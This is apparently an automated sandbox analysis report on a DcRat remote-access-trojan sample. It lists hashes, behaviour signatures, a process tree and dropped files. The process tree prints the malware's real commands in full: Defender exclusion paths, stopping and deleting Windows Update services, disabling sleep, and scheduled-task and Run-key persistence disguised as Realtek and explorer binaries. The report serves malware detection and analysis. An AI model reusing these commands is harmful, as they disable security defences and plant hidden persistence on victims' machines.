Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
22-03-2023 01:32
General
-
Target
7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe
-
Size
10.0MB
-
MD5
718c1a4f0cdacf94d4d6ad97e06a459f
-
SHA1
f7ea9a4f39e415c15ef563ecd4f381013e52d3a7
-
SHA256
7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033
-
SHA512
8a3d55db0a4eae644922895e140269f22f8214af875bf3544255bcc1be6b1de9a1274b1dd41cc4ac5826a9ac5e1d8d216994891dc124c01ba722db214652f80e
-
SSDEEP
196608:2JJ8G/X6v9189c+HzrMyU59NSOWQqA00aWOj/AoDvVq:2JJTCv8cEnMrrNSOhLPOj/Pv
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies security service 2 TTPs 5 IoCs
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
DCRat payload 8 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe"C:\Users\Admin\AppData\Local\Temp\7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe"C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XCPxq7rxxR.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵
-
C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\explorer.exe"C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\explorer.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\conhost_8.exe"C:\Users\Admin\AppData\Roaming\conhost_8.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#svswkfzf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Realtek' /tr '''C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Realtek' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Realtek" /t REG_SZ /f /d 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe' }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#fvdhjwqj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Realtek" } Else { "C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe" }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Realtek4⤵
-
C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe"C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Downloads\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Downloads\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Downloads\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe"C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#svswkfzf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Realtek' /tr '''C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Realtek' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Realtek" /t REG_SZ /f /d 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe lloebzutcnm2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exeFilesize
2.0MB
MD5158fc80385e03bc9190be1d44493b585
SHA190c82c58432711d773e70b351c7943c7354b9930
SHA25630ba733a5d5626ed0787a7fef982b8f426dfe2c70c42c9086fb581d20406bef8
SHA51212c9eccee01f9322cb6a063f5a7bd8f4755f641bf37c72864c0d9602a750bc69a29cc7192d7cf7573790461aa3356d4924c79bacb3c6f8099f448891533976b5
-
C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exeFilesize
2.0MB
MD5158fc80385e03bc9190be1d44493b585
SHA190c82c58432711d773e70b351c7943c7354b9930
SHA25630ba733a5d5626ed0787a7fef982b8f426dfe2c70c42c9086fb581d20406bef8
SHA51212c9eccee01f9322cb6a063f5a7bd8f4755f641bf37c72864c0d9602a750bc69a29cc7192d7cf7573790461aa3356d4924c79bacb3c6f8099f448891533976b5
-
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\explorer.exeFilesize
1.6MB
MD50ea53df77445bfbde349bd4eed09dae1
SHA1b4df1111097fbfb9a9ea3ad86ac130716fea12d0
SHA25683f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335
SHA5124396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5b51dc9e5ec3c97f72b4ca9488bbb4462
SHA15c1e8c0b728cd124edcacefb399bbd5e25b21bd3
SHA256976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db
SHA5120e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d76f1ecef58126ce7607adbdd0d29804
SHA1d9f236fe4bfbd818d19fb1cbd50d2466b4f1002d
SHA25626377db968f34031c72ae2cf3272368e6a94dd5380d41704e4fddd283aa8220a
SHA51272b9551058dd2769cc3c3b1a8f0b8339b78e07bc93646293578e31d09ae5e3081e8d78b825cc5c8a915a495677725871b4de499e50b2bcebbf0b1ef4acb3164c
-
C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exeFilesize
2.1MB
MD53ee631ed0386c88faaad83c97ade2dcd
SHA1308ac9da54565404430b220881c76f49793c0e9f
SHA256be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6
SHA512976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d
-
C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exeFilesize
2.1MB
MD53ee631ed0386c88faaad83c97ade2dcd
SHA1308ac9da54565404430b220881c76f49793c0e9f
SHA256be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6
SHA512976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d
-
C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exeFilesize
2.1MB
MD53ee631ed0386c88faaad83c97ade2dcd
SHA1308ac9da54565404430b220881c76f49793c0e9f
SHA256be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6
SHA512976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d
-
C:\Users\Admin\AppData\Local\Temp\XCPxq7rxxR.batFilesize
249B
MD52b5fe8dae625a50445dd1204b6944d8d
SHA19c8f40eef854eda1b32a51c8670c114a7a5a6b99
SHA256ff8dd65366ffe953d6de103e391f84fcd2956f0f4c5ff96aee64f1bb09f63529
SHA5120cfb3b958f5331fcf20ba996bf53744b8a507d47c316fb9db895ecadf35fb679258c0381342b397709ef2b4b145a17bfe29fb7987b27ca37e3b726a1a252d78b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zbis5asf.n10.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exeFilesize
1.6MB
MD50ea53df77445bfbde349bd4eed09dae1
SHA1b4df1111097fbfb9a9ea3ad86ac130716fea12d0
SHA25683f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335
SHA5124396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357
-
C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exeFilesize
1.6MB
MD50ea53df77445bfbde349bd4eed09dae1
SHA1b4df1111097fbfb9a9ea3ad86ac130716fea12d0
SHA25683f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335
SHA5124396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357
-
C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exeFilesize
1.6MB
MD50ea53df77445bfbde349bd4eed09dae1
SHA1b4df1111097fbfb9a9ea3ad86ac130716fea12d0
SHA25683f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335
SHA5124396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357
-
C:\Users\Admin\AppData\Roaming\conhost_8.exeFilesize
2.0MB
MD5b521b2a220a99d820b688d4ad5db8067
SHA108e97a2e4871b789d3388fd51479710626b69a92
SHA25655371f430ea0369bf4e079f39558a4c6c5462b19ddc9f16f064286288f50a12b
SHA5122e4d9b8d556a609abae4dfedf18136618fb1bb8f77d3a596c97bffc2edde9dec147456dcf586c00de9a438b789599fe288de8117109b6b04db9045279b3caca1
-
C:\Users\Admin\AppData\Roaming\conhost_8.exeFilesize
2.0MB
MD5b521b2a220a99d820b688d4ad5db8067
SHA108e97a2e4871b789d3388fd51479710626b69a92
SHA25655371f430ea0369bf4e079f39558a4c6c5462b19ddc9f16f064286288f50a12b
SHA5122e4d9b8d556a609abae4dfedf18136618fb1bb8f77d3a596c97bffc2edde9dec147456dcf586c00de9a438b789599fe288de8117109b6b04db9045279b3caca1
-
C:\Users\Admin\AppData\Roaming\conhost_8.exeFilesize
2.0MB
MD5b521b2a220a99d820b688d4ad5db8067
SHA108e97a2e4871b789d3388fd51479710626b69a92
SHA25655371f430ea0369bf4e079f39558a4c6c5462b19ddc9f16f064286288f50a12b
SHA5122e4d9b8d556a609abae4dfedf18136618fb1bb8f77d3a596c97bffc2edde9dec147456dcf586c00de9a438b789599fe288de8117109b6b04db9045279b3caca1
-
C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\explorer.exeFilesize
1.6MB
MD50ea53df77445bfbde349bd4eed09dae1
SHA1b4df1111097fbfb9a9ea3ad86ac130716fea12d0
SHA25683f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335
SHA5124396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
memory/288-357-0x00007FF751E90000-0x00007FF7520A5000-memory.dmpFilesize
2.1MB
-
memory/288-365-0x00007FF751E90000-0x00007FF7520A5000-memory.dmpFilesize
2.1MB
-
memory/288-299-0x00007FF751E90000-0x00007FF7520A5000-memory.dmpFilesize
2.1MB
-
memory/1292-300-0x000000001CE70000-0x000000001CF70000-memory.dmpFilesize
1024KB
-
memory/1292-368-0x000000001CE70000-0x000000001CF70000-memory.dmpFilesize
1024KB
-
memory/1292-298-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-206-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-207-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-209-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-208-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-301-0x000000001CE70000-0x000000001CF70000-memory.dmpFilesize
1024KB
-
memory/1292-380-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-292-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-366-0x000000001CE70000-0x000000001CF70000-memory.dmpFilesize
1024KB
-
memory/1292-297-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-296-0x000000001CE70000-0x000000001CF70000-memory.dmpFilesize
1024KB
-
memory/1292-295-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-294-0x000000001B170000-0x000000001B180000-memory.dmpFilesize
64KB
-
memory/1292-293-0x000000001CE70000-0x000000001CF70000-memory.dmpFilesize
1024KB
-
memory/1292-379-0x000000001CE70000-0x000000001CF70000-memory.dmpFilesize
1024KB
-
memory/1776-273-0x000001C287300000-0x000001C287310000-memory.dmpFilesize
64KB
-
memory/1776-272-0x000001C287300000-0x000001C287310000-memory.dmpFilesize
64KB
-
memory/1776-274-0x000001C287300000-0x000001C287310000-memory.dmpFilesize
64KB
-
memory/1860-220-0x0000023987640000-0x0000023987650000-memory.dmpFilesize
64KB
-
memory/1860-221-0x0000023987640000-0x0000023987650000-memory.dmpFilesize
64KB
-
memory/1920-195-0x000000001B1C9000-0x000000001B1CF000-memory.dmpFilesize
24KB
-
memory/1920-173-0x000000001B1C0000-0x000000001B1D0000-memory.dmpFilesize
64KB
-
memory/1920-158-0x0000000000490000-0x000000000063E000-memory.dmpFilesize
1.7MB
-
memory/1920-167-0x000000001B1C0000-0x000000001B1D0000-memory.dmpFilesize
64KB
-
memory/1920-168-0x000000001C500000-0x000000001C550000-memory.dmpFilesize
320KB
-
memory/1920-169-0x000000001CBA0000-0x000000001D0C8000-memory.dmpFilesize
5.2MB
-
memory/1920-171-0x000000001B1C0000-0x000000001B1D0000-memory.dmpFilesize
64KB
-
